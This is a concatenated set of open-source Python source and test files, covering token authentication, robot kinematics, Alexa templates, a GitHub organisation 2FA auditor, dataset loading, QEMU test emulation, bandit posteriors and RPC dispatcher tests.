if auth.username[0] not in string.ascii_letters:
return None
return user_datastore.get_user(auth.username)
def get_token_from_request(request):
token_auth_header = current_app.config[
'SECURITY_TOKEN_AUTHENTICATION_HEADER']
return request.headers.get(token_auth_header)
def get_api_token_from_request(request):
return request.headers.get(CLOUDIFY_API_AUTH_TOKEN_HEADER)
def get_token_status(token):
"""Mimic flask_security.utils.get_token_status with some changes
:param token: The token to decrypt
:return: A tuple: (expired, invalid, user, data)
"""
security = current_app.extensions['security']
serializer = security.remember_token_serializer
max_age = security.token_max_age
user, data, error = None, None, None
expired, invalid = False, False
try:
data = serializer.loads(token, max_age=max_age)
except SignatureExpired:
expired = True
except (BadSignature, TypeError, ValueError) as e:
invalid = True
error = e
if data:
user = user_datastore.find_user(id=data[0])
return expired, invalid, user, data, error
|
sympybotics/kinematics.py | ZhangMeiHuiROS/Sym_RobotD | 117 | 12770488 |
import sympy
_id = lambda x: x
class Kinematics(object):
"""Robot symbolic Jacobians.
kinobj.J: list of link frame Jacobians - complete (6 x N):
[linear_velocity
angular_velocity] = J * joint_velocities
kinobj.Jc: list of link center-of-mass Jacobians - complete
kinobj.Jp: list of link frame Jacobians - linear velocity part only
kinobj.Jo: list of link frame Jacobians - angular velocity part only
kinobj.Jcp: list of link center-of-mass Jacobians - linear part
kinobj.Jco: list of link center-of-mass Jacobians - angular part
"""
def __init__(self, robotdef, geom, ifunc=None):
if not ifunc:
ifunc = _id
self.rbtdef = robotdef
self.geom = geom
self.dof = self.rbtdef.dof
def sym_skew(v):
return sympy.Matrix([[0, -v[2], v[1]],
[v[2], 0, -v[0]],
[-v[1], v[0], 0]])
if self.rbtdef._dh_convention == 'standard':
# extend z and p so that z[-1] and p[-1] return values from base
# frame
z_ext = geom.z + [sympy.Matrix([0, 0, 1])]
p_ext = geom.p + [sympy.zeros(3, 1)]
self.Jp = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jp[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jp[l][0:3, j] = ifunc(z_ext[j - 1])
else:
self.Jp[l][0:3, j] = ifunc(z_ext[j - 1].cross(
(p_ext[l] - p_ext[j - 1])).reshape(3, 1))
self.Jo = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jo[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jo[l][0:3, j] = sympy.zeros(3, 1)
else:
self.Jo[l][0:3, j] = ifunc(z_ext[j - 1])
elif self.rbtdef._dh_convention == 'modified':
self.Jp = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jp[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jp[l][0:3, j] = ifunc(geom.z[j])
else:
self.Jp[l][0:3, j] = ifunc(geom.z[j].cross(
(geom.p[l] - geom.p[j])).reshape(3, 1))
self.Jo = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jo[l] = sympy.zeros(3, self.rbtdef.dof)
for j in range(l + 1):
if self.rbtdef._links_sigma[j]:
self.Jo[l][0:3, j] = sympy.zeros(3, 1)
else:
self.Jo[l][0:3, j] = ifunc(geom.z[j])
self.J = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.J[l] = self.Jp[l].col_join(self.Jo[l])
self.Jcp = list(range(self.rbtdef.dof))
self.Jco = self.Jo
for l in range(self.rbtdef.dof):
self.Jcp[l] = ifunc(self.Jp[l] - sym_skew(
geom.R[l] * sympy.Matrix(self.rbtdef.l[l])) * self.Jo[l])
self.Jc = list(range(self.rbtdef.dof))
for l in range(self.rbtdef.dof):
self.Jc[l] = self.Jcp[l].col_join(self.Jco[l])
|
testproj/testproj/util.py | MilanPecov/drf-yasg | 2,788 | 12770494 | from django.templatetags.static import static
from django.utils.functional import lazy
static_lazy = lazy(static, str)
|
env/lib/python3.8/site-packages/ask_sdk_core/view_resolvers/locale_template_enumerator.py | adamash99/alexa-play-pot-of-greed | 496 | 12770512 | <gh_stars>100-1000
# -- coding: utf-8 --
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the
# License.
#
import os
import typing
from ask_sdk_runtime.view_resolvers import AbstractTemplateEnumerator
from ask_sdk_core.utils.view_resolver import split_locale
if typing.TYPE_CHECKING:
from typing import Iterator, Type
from ask_sdk_core.handler_input import HandlerInput
class LocaleTemplateEnumerator(AbstractTemplateEnumerator):
"""Enumerator to enumerate template name based on locale property.
Enumerate possible combinations of template name and given locale
from the HandlerInput.
For Example: For locale: 'en-US' and a response template name "template",
the following combinations will be generated:
template/en/US
template/en_US
template/en
template_en_US
template_en
template
"""
__instance = None
def __new__(cls):
# type: (Type[object]) -> LocaleTemplateEnumerator
"""Creating a singleton class to re-use same enumerator instance for
different locale and template values.
"""
if LocaleTemplateEnumerator.__instance is None:
LocaleTemplateEnumerator.__instance = object.__new__(cls)
return LocaleTemplateEnumerator.__instance
def __init__(self):
# type: () -> None
"""Enumerator to generate different path combinations for a given
locale to load the template.
"""
pass
def generate_combinations(self, handler_input, template_name):
# type: (HandlerInput, str) -> Iterator[str]
"""Create a generator object to iterate over different combinations
of template name and locale property.
:param handler_input: Handler Input instance with
Request Envelope containing Request.
:type handler_input: :py:class:`ask_sdk_core.handler_input.HandlerInput`
:param template_name: Template name which needs to be loaded
:type template_name: str
:return: Generator object which returns
relative paths of the template file
:rtype: Iterator[str]
"""
locale = handler_input.request_envelope.request.locale
language, country = split_locale(locale=locale)
if not language and not country:
yield template_name
else:
yield os.path.join(template_name, language, country)
yield os.path.join(template_name, (language + "_" + country))
yield os.path.join(template_name, language)
yield (template_name + "_" + language + "_" + country)
yield (template_name + "_" + language)
yield template_name
|
security_monkey/auditors/github/org.py | boladmin/security_monkey | 4,258 | 12770530 | # Copyright 2017 Netflix
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.watchers.github.org
:platform: Unix
:synopsis: Auditor for GitHub Organizations
.. version:: $$VERSION$$
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from security_monkey.auditor import Auditor
from security_monkey.watchers.github.org import GitHubOrg
class GitHubOrgAuditor(Auditor):
index = GitHubOrg.index
i_am_singular = GitHubOrg.i_am_singular
i_am_plural = GitHubOrg.i_am_plural
def __init__(self, accounts=None, debug=False):
super(GitHubOrgAuditor, self).__init__(accounts=accounts, debug=debug)
def check_for_public_repo(self, org_item):
"""
Organizational view that it has public repositories. Default score of 0. This is mostly
informational.
:param org_item:
:return:
"""
tag = "Organization contains public repositories."
if org_item.config["public_repos"] > 0:
self.add_issue(0, tag, org_item, notes="Organization contains public repositories")
def check_for_non_twofa_members(self, org_item):
"""
Alert if the org has users that don't have 2FA enabled.
Will keep this at a level of 2 -- unles there are admins without 2FA, then that is level 10!
:param org_item:
:return:
"""
tag = "Organization contains users without 2FA enabled."
owner_no_twofa = "Organization owner does NOT have 2FA enabled!"
if len(org_item.config["no_2fa_members"]) > 0:
self.add_issue(2, tag, org_item, notes="Organization contains users without 2FA enabled")
for notwofa in org_item.config["no_2fa_members"]:
if notwofa in org_item.config["owners"]:
self.add_issue(10, owner_no_twofa, org_item, notes="Organization OWNER: {} does NOT "
"have 2FA enabled!".format(notwofa))
|
npt/datasets/income.py | jacobkimmel/non-parametric-transformers | 302 | 12770538 | <filename>npt/datasets/income.py
from pathlib import Path
import numpy as np
import pandas as pd
from sklearn.datasets import fetch_openml
from npt.datasets.base import BaseDataset
class IncomeDataset(BaseDataset):
def __init__(self, c):
super().__init__(
fixed_test_set_index=-99762)
self.c = c
def load(self):
"""KDD Income Dataset
Possibly used in VIME and TabNet.
There are multiple datasets called income.
https://archive.ics.uci.edu/ml/datasets/census+income
https://archive.ics.uci.edu/ml/datasets/Census-Income+%28KDD%29
The KDD One is significantly larger than the other one.
We will take KDD one. Both TabNet and VIME are not super explicit about
which dataset they use.
TabNet cite Oza et al "Online Bagging and Boosting", which use the
bigger one. So we will start with that.
(But there is no full TabNet Code to confirm.)
Binary classification.
Target in last column.
299.285 rows.
42 attributes. Use get_num_cat_auto to assign.
1 target
"""
# Load data from https://www.openml.org/d/4535
data_home = Path(self.c.data_path) / self.c.data_set
data = fetch_openml('Census-income', version=1, data_home=data_home)
# target in 'data'
self.data_table = data['data']
if isinstance(self.data_table, np.ndarray):
pass
elif isinstance(self.data_table, pd.DataFrame):
self.data_table = self.data_table.to_numpy()
self.N = self.data_table.shape[0]
self.D = self.data_table.shape[1]
# Target col is the last feature
# last column is target (V42)
# (binary classification, if income > or < 50k)
self.num_target_cols = []
self.cat_target_cols = [self.D - 1]
self.num_features, self.cat_features = BaseDataset.get_num_cat_auto(
self.data_table, cutoff=55)
print('income num cat features')
print(len(self.num_features))
print(len(self.cat_features))
# TODO: add missing entries to sanity check
self.missing_matrix = np.zeros((self.N, self.D), dtype=np.bool_)
self.is_data_loaded = True
self.tmp_file_or_dir_names = ['openml'] |
libraries/botbuilder-core/tests/test_private_conversation_state.py | Fl4v/botbuilder-python | 388 | 12770540 | <filename>libraries/botbuilder-core/tests/test_private_conversation_state.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import aiounittest
from botbuilder.core import MemoryStorage, TurnContext, PrivateConversationState
from botbuilder.core.adapters import TestAdapter
from botbuilder.schema import Activity, ChannelAccount, ConversationAccount
RECEIVED_MESSAGE = Activity(
text="received",
type="message",
channel_id="test",
conversation=ConversationAccount(id="convo"),
from_property=ChannelAccount(id="user"),
)
class TestPrivateConversationState(aiounittest.AsyncTestCase):
async def test_should_load_and_save_state_from_storage(self):
storage = MemoryStorage()
adapter = TestAdapter()
context = TurnContext(adapter, RECEIVED_MESSAGE)
private_conversation_state = PrivateConversationState(storage)
# Simulate a "Turn" in a conversation by loading the state,
# changing it and then saving the changes to state.
await private_conversation_state.load(context)
key = private_conversation_state.get_storage_key(context)
state = private_conversation_state.get(context)
assert state == {}, "State not loaded"
assert key, "Key not found"
state["test"] = "foo"
await private_conversation_state.save_changes(context)
# Check the storage to see if the changes to state were saved.
items = await storage.read([key])
assert key in items, "Saved state not found in storage."
assert items[key]["test"] == "foo", "Missing test value in stored state."
|
buildroot/support/testing/infra/emulator.py | rbrenton/hassos | 617 | 12770543 | <reponame>rbrenton/hassos
import pexpect
import infra
class Emulator(object):
def __init__(self, builddir, downloaddir, logtofile, timeout_multiplier):
self.qemu = None
self.downloaddir = downloaddir
self.logfile = infra.open_log_file(builddir, "run", logtofile)
# We use elastic runners on the cloud to runs our tests. Those runners
# can take a long time to run the emulator. Use a timeout multiplier
# when running the tests to avoid sporadic failures.
self.timeout_multiplier = timeout_multiplier
# Start Qemu to boot the system
#
# arch: Qemu architecture to use
#
# kernel: path to the kernel image, or the special string
# 'builtin'. 'builtin' means a pre-built kernel image will be
# downloaded from ARTEFACTS_URL and suitable options are
# automatically passed to qemu and added to the kernel cmdline. So
# far only armv5, armv7 and i386 builtin kernels are available.
# If None, then no kernel is used, and we assume a bootable device
# will be specified.
#
# kernel_cmdline: array of kernel arguments to pass to Qemu -append option
#
# options: array of command line options to pass to Qemu
#
def boot(self, arch, kernel=None, kernel_cmdline=None, options=None):
if arch in ["armv7", "armv5"]:
qemu_arch = "arm"
else:
qemu_arch = arch
qemu_cmd = ["qemu-system-{}".format(qemu_arch),
"-serial", "stdio",
"-display", "none"]
if options:
qemu_cmd += options
if kernel_cmdline is None:
kernel_cmdline = []
if kernel:
if kernel == "builtin":
if arch in ["armv7", "armv5"]:
kernel_cmdline.append("console=ttyAMA0")
if arch == "armv7":
kernel = infra.download(self.downloaddir,
"kernel-vexpress")
dtb = infra.download(self.downloaddir,
"vexpress-v2p-ca9.dtb")
qemu_cmd += ["-dtb", dtb]
qemu_cmd += ["-M", "vexpress-a9"]
elif arch == "armv5":
kernel = infra.download(self.downloaddir,
"kernel-versatile")
qemu_cmd += ["-M", "versatilepb"]
qemu_cmd += ["-kernel", kernel]
if kernel_cmdline:
qemu_cmd += ["-append", " ".join(kernel_cmdline)]
self.logfile.write("> starting qemu with '%s'\n" % " ".join(qemu_cmd))
self.qemu = pexpect.spawn(qemu_cmd[0], qemu_cmd[1:],
timeout=5 * self.timeout_multiplier,
env={"QEMU_AUDIO_DRV": "none"})
# We want only stdout into the log to avoid double echo
self.qemu.logfile_read = self.logfile
# Wait for the login prompt to appear, and then login as root with
# the provided password, or no password if not specified.
def login(self, password=None):
# The login prompt can take some time to appear when running multiple
# instances in parallel, so set the timeout to a large value
index = self.qemu.expect(["buildroot login:", pexpect.TIMEOUT],
timeout=60 * self.timeout_multiplier)
if index != 0:
self.logfile.write("==> System does not boot")
raise SystemError("System does not boot")
self.qemu.sendline("root")
if password:
self.qemu.expect("Password:")
self.qemu.sendline(password)
index = self.qemu.expect(["# ", pexpect.TIMEOUT])
if index != 0:
raise SystemError("Cannot login")
self.run("dmesg -n 1")
# Run the given 'cmd' with a 'timeout' on the target
# return a tuple (output, exit_code)
def run(self, cmd, timeout=-1):
self.qemu.sendline(cmd)
if timeout != -1:
timeout *= self.timeout_multiplier
self.qemu.expect("# ", timeout=timeout)
# Remove double carriage return from qemu stdout so str.splitlines()
# works as expected.
output = self.qemu.before.replace("\r\r", "\r").splitlines()[1:]
self.qemu.sendline("echo $?")
self.qemu.expect("# ")
exit_code = self.qemu.before.splitlines()[2]
exit_code = int(exit_code)
return output, exit_code
def stop(self):
if self.qemu is None:
return
self.qemu.terminate(force=True)
|
SMPyBandits/Policies/Posterior/DiscountedBeta.py | balbok0/SMPyBandits | 309 | 12770557 | # -*- coding: utf-8 -*-
r""" Manipulate posteriors of Bernoulli/Beta experiments., for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`).
"""
from __future__ import division, print_function # Python 2 compatibility
__author__ = "<NAME>"
__version__ = "0.9"
# Local imports
try:
from .Beta import Beta, bernoulliBinarization
from .with_proba import with_proba
except (ImportError, SystemError):
from Beta import Beta, bernoulliBinarization
from with_proba import with_proba
try:
from numpy.random import beta as betavariate # Faster! Yes!
except ImportError:
from random import betavariate
from scipy.special import btdtri
# --- Constants
#: Default value for the discount factor :math:`\gamma\in(0,1)`.
#: ``0.95`` is empirically a reasonable value for short-term non-stationary experiments.
GAMMA = 0.95
# --- Class
class DiscountedBeta(Beta):
r""" Manipulate posteriors of Bernoulli/Beta experiments, for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`).
- It keeps :math:`\tilde{S}(t)` and :math:`\tilde{F}(t)` the *discounted* counts of successes and failures (S and F).
"""
def __init__(self, gamma=GAMMA, a=1, b=1):
r""" Create a Beta posterior :math:`\mathrm{Beta}(\alpha, \beta)` with no observation, i.e., :math:`\alpha = 1` and :math:`\beta = 1` by default."""
assert a >= 0, "Error: parameter 'a' for Beta posterior has to be >= 0." # DEBUG
self._a = a
assert b >= 0, "Error: parameter 'b' for Beta posterior has to be >= 0." # DEBUG
self._b = b
self.N = [0, 0] #: List of two parameters [a, b]
assert 0 < gamma <= 1, "Error: for a DiscountedBayesianIndexPolicy policy, the discount factor has to be in (0,1], but it was {}.".format(gamma) # DEBUG
if gamma == 1:
print("Warning: gamma = 1 is stupid, just use a regular Beta posterior!") # DEBUG
self.gamma = gamma #: Discount factor :math:`\gamma\in(0,1)`.
def __str__(self):
return r"DiscountedBeta(\alpha={:.3g}, \beta={:.3g})".format(self.N[1], self.N[0])
def reset(self, a=None, b=None):
"""Reset alpha and beta, both to 0 as when creating a new default DiscountedBeta."""
if a is None:
a = self._a
if b is None:
b = self._b
self.N = [0, 0]
def sample(self):
"""Get a random sample from the DiscountedBeta posterior (using :func:`numpy.random.betavariate`).
- Used only by :class:`Thompson` Sampling and :class:`AdBandits` so far.
"""
return betavariate(self._a + self.N[1], self._b + self.N[0])
def quantile(self, p):
"""Return the p quantile of the DiscountedBeta posterior (using :func:`scipy.stats.btdtri`).
- Used only by :class:`BayesUCB` and :class:`AdBandits` so far.
"""
return btdtri(self._a + self.N[1], self._b + self.N[0], p)
# Bug: do not call btdtri with (0.5,0.5,0.5) in scipy version < 0.9 (old)
def forget(self, obs):
"""Forget the last observation, and undiscount the count of observations."""
# print("Info: calling DiscountedBeta.forget() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG
# FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}...
binaryObs = bernoulliBinarization(obs)
self.N[binaryObs] = (self.N[binaryObs] - 1) / self.gamma
otherObs = 1 - binaryObs
self.N[otherObs] = self.N[otherObs] / self.gamma
def update(self, obs):
r""" Add an observation, and discount the previous observations.
- If obs is 1, update :math:`\alpha` the count of positive observations,
- If it is 0, update :math:`\beta` the count of negative observations.
- But instead of using :math:`\tilde{S}(t) = S(t)` and :math:`\tilde{N}(t) = N(t)`, they are updated at each time step using the discount factor :math:`\gamma`:
.. math::
\tilde{S}(t+1) &= \gamma \tilde{S}(t) + r(t),
\tilde{F}(t+1) &= \gamma \tilde{F}(t) + (1 - r(t)).
.. note:: Otherwise, a trick with :func:`bernoulliBinarization` has to be used.
"""
# print("Info: calling DiscountedBeta.update() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG
# FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}...
binaryObs = bernoulliBinarization(obs)
self.N[binaryObs] = self.gamma * self.N[binaryObs] + 1
otherObs = 1 - binaryObs
self.N[otherObs] = self.gamma * self.N[otherObs]
def discount(self):
r""" Simply discount the old observation, when no observation is given at this time.
.. math::
\tilde{S}(t+1) &= \gamma \tilde{S}(t),
\tilde{F}(t+1) &= \gamma \tilde{F}(t).
"""
# print("Info: calling DiscountedBeta.discount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG
self.N[0] = max(0, self.gamma * self.N[0])
self.N[1] = max(0, self.gamma * self.N[1])
def undiscount(self):
r""" Simply cancel the discount on the old observation, when no observation is given at this time.
.. math::
\tilde{S}(t+1) &= \frac{1}{\gamma} \tilde{S}(t),
\tilde{F}(t+1) &= \frac{1}{\gamma} \tilde{F}(t).
"""
# print("Info: calling DiscountedBeta.undiscount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG
self.N[0] = max(0, self.N[0] / self.gamma)
self.N[1] = max(0, self.N[1] / self.gamma)
|
tests/communication/utils.py | yangboz/maro | 598 | 12770564 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import socket
from maro.communication import Proxy
def get_random_port():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as temp_socket:
temp_socket.bind(("", 0))
random_port = temp_socket.getsockname()[1]
return random_port
def proxy_generator(component_type, redis_port):
proxy_parameters = {
"group_name": "communication_unit_test",
"redis_address": ("localhost", redis_port),
"log_enable": False
}
component_type_expected_peers_map = {
"receiver": {"sender": 1},
"sender": {"receiver": 1},
"master": {"worker": 5},
"worker": {"master": 1}
}
proxy = Proxy(
component_type=component_type,
expected_peers=component_type_expected_peers_map[component_type],
**proxy_parameters
)
return proxy
|
chapter5_operations/prediction_monitoring_pattern/src/ml/data.py | sudabon/ml-system-in-actions | 133 | 12770567 | <reponame>sudabon/ml-system-in-actions
from typing import List
from pydantic import BaseModel
class Data(BaseModel):
data: List[List[float]] = [[5.1, 3.5, 1.4, 0.2]]
|
oslo_messaging/tests/rpc/test_dispatcher.py | sapcc/oslo.messaging | 131 | 12770589 | <gh_stars>100-1000
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testscenarios
import time
import oslo_messaging
from oslo_messaging import rpc
from oslo_messaging import serializer as msg_serializer
from oslo_messaging.tests import utils as test_utils
from unittest import mock
load_tests = testscenarios.load_tests_apply_scenarios
class _FakeEndpoint(object):
def __init__(self, target=None):
self.target = target
def foo(self, ctxt, **kwargs):
pass
@rpc.expose
def bar(self, ctxt, **kwargs):
pass
def _foobar(self, ctxt, **kwargs):
pass
class TestDispatcher(test_utils.BaseTestCase):
scenarios = [
('no_endpoints',
dict(endpoints=[],
access_policy=None,
dispatch_to=None,
ctxt={}, msg=dict(method='foo'),
exposed_methods=['foo', 'bar', '_foobar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('default_target',
dict(endpoints=[{}],
access_policy=None,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo'),
exposed_methods=['foo', 'bar', '_foobar'],
success=True, ex=None)),
('default_target_ctxt_and_args',
dict(endpoints=[{}],
access_policy=oslo_messaging.LegacyRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='bar'),
ctxt=dict(user='bob'), msg=dict(method='bar',
args=dict(blaa=True)),
exposed_methods=['foo', 'bar', '_foobar'],
success=True, ex=None)),
('default_target_namespace',
dict(endpoints=[{}],
access_policy=oslo_messaging.LegacyRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace=None),
exposed_methods=['foo', 'bar', '_foobar'],
success=True, ex=None)),
('default_target_version',
dict(endpoints=[{}],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', version='1.0'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('default_target_no_such_method',
dict(endpoints=[{}],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foobar'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.NoSuchMethod)),
('namespace',
dict(endpoints=[{}, dict(namespace='testns')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=1, method='foo'),
ctxt={}, msg=dict(method='foo', namespace='testns'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('namespace_mismatch',
dict(endpoints=[{}, dict(namespace='testns')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foo', namespace='nstest'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('version',
dict(endpoints=[dict(version='1.5'), dict(version='3.4')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=1, method='foo'),
ctxt={}, msg=dict(method='foo', version='3.2'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('version_mismatch',
dict(endpoints=[dict(version='1.5'), dict(version='3.0')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foo', version='3.2'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('message_in_null_namespace_with_multiple_namespaces',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=[None])],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace=None),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('message_in_wrong_namespace_with_multiple_namespaces',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None])],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foo', namespace='wrong'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('message_with_endpoint_no_private_and_public_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None])],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace='testns'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('message_with_endpoint_no_private_and_private_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None], )],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='_foobar'),
ctxt={}, msg=dict(method='_foobar', namespace='testns'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.NoSuchMethod)),
('message_with_endpoint_explicitly_exposed_without_exposed_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None], )],
access_policy=oslo_messaging.ExplicitRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace='testns'),
exposed_methods=['bar'],
success=False, ex=oslo_messaging.NoSuchMethod)),
('message_with_endpoint_explicitly_exposed_with_exposed_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None], )],
access_policy=oslo_messaging.ExplicitRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='bar'),
ctxt={}, msg=dict(method='bar', namespace='testns'),
exposed_methods=['bar'],
success=True, ex=None)),
]
def test_dispatcher(self):
def _set_endpoint_mock_properties(endpoint):
endpoint.foo = mock.Mock(spec=dir(_FakeEndpoint.foo))
# mock doesn't pick up the decorated method.
endpoint.bar = mock.Mock(spec=dir(_FakeEndpoint.bar))
endpoint.bar.exposed = mock.PropertyMock(return_value=True)
endpoint._foobar = mock.Mock(spec=dir(_FakeEndpoint._foobar))
return endpoint
endpoints = [_set_endpoint_mock_properties(mock.Mock(
spec=_FakeEndpoint, target=oslo_messaging.Target(**e)))
for e in self.endpoints]
serializer = None
dispatcher = oslo_messaging.RPCDispatcher(endpoints, serializer,
self.access_policy)
incoming = mock.Mock(ctxt=self.ctxt, message=self.msg,
client_timeout=0)
res = None
try:
res = dispatcher.dispatch(incoming)
except Exception as ex:
self.assertFalse(self.success, ex)
self.assertIsNotNone(self.ex, ex)
self.assertIsInstance(ex, self.ex, ex)
if isinstance(ex, oslo_messaging.NoSuchMethod):
self.assertEqual(self.msg.get('method'), ex.method)
elif isinstance(ex, oslo_messaging.UnsupportedVersion):
self.assertEqual(self.msg.get('version', '1.0'),
ex.version)
if ex.method:
self.assertEqual(self.msg.get('method'), ex.method)
else:
self.assertTrue(self.success,
"Unexpected success of operation during testing")
self.assertIsNotNone(res)
for n, endpoint in enumerate(endpoints):
for method_name in self.exposed_methods:
method = getattr(endpoint, method_name)
if self.dispatch_to and n == self.dispatch_to['endpoint'] and \
method_name == self.dispatch_to['method'] and \
method_name in self.exposed_methods:
method.assert_called_once_with(
self.ctxt, **self.msg.get('args', {}))
else:
self.assertEqual(0, method.call_count,
'method: {}'.format(method))
class TestDispatcherWithPingEndpoint(test_utils.BaseTestCase):
def test_dispatcher_with_ping(self):
self.config(rpc_ping_enabled=True)
dispatcher = oslo_messaging.RPCDispatcher([], None, None)
incoming = mock.Mock(ctxt={},
message=dict(method='oslo_rpc_server_ping'),
client_timeout=0)
res = dispatcher.dispatch(incoming)
self.assertEqual('pong', res)
def test_dispatcher_with_ping_already_used(self):
class MockEndpoint(object):
def oslo_rpc_server_ping(self, ctxt, **kwargs):
return 'not_pong'
mockEndpoint = MockEndpoint()
self.config(rpc_ping_enabled=True)
dispatcher = oslo_messaging.RPCDispatcher([mockEndpoint], None, None)
incoming = mock.Mock(ctxt={},
message=dict(method='oslo_rpc_server_ping'),
client_timeout=0)
res = dispatcher.dispatch(incoming)
self.assertEqual('not_pong', res)
class TestSerializer(test_utils.BaseTestCase):
scenarios = [
('no_args_or_retval',
dict(ctxt={}, dctxt={}, args={}, retval=None)),
('args_and_retval',
dict(ctxt=dict(user='bob'),
dctxt=dict(user='alice'),
args=dict(a='a', b='b', c='c'),
retval='d')),
]
def test_serializer(self):
endpoint = _FakeEndpoint()
serializer = msg_serializer.NoOpSerializer()
dispatcher = oslo_messaging.RPCDispatcher([endpoint], serializer)
endpoint.foo = mock.Mock()
args = dict([(k, 'd' + v) for k, v in self.args.items()])
endpoint.foo.return_value = self.retval
serializer.serialize_entity = mock.Mock()
serializer.deserialize_entity = mock.Mock()
serializer.deserialize_context = mock.Mock()
serializer.deserialize_context.return_value = self.dctxt
expected_side_effect = ['d' + arg for arg in self.args]
serializer.deserialize_entity.side_effect = expected_side_effect
serializer.serialize_entity.return_value = None
if self.retval:
serializer.serialize_entity.return_value = 's' + self.retval
incoming = mock.Mock()
incoming.ctxt = self.ctxt
incoming.message = dict(method='foo', args=self.args)
incoming.client_timeout = 0
retval = dispatcher.dispatch(incoming)
if self.retval is not None:
self.assertEqual('s' + self.retval, retval)
endpoint.foo.assert_called_once_with(self.dctxt, **args)
serializer.deserialize_context.assert_called_once_with(self.ctxt)
expected_calls = [mock.call(self.dctxt, arg) for arg in self.args]
self.assertEqual(expected_calls,
serializer.deserialize_entity.mock_calls)
serializer.serialize_entity.assert_called_once_with(self.dctxt,
self.retval)
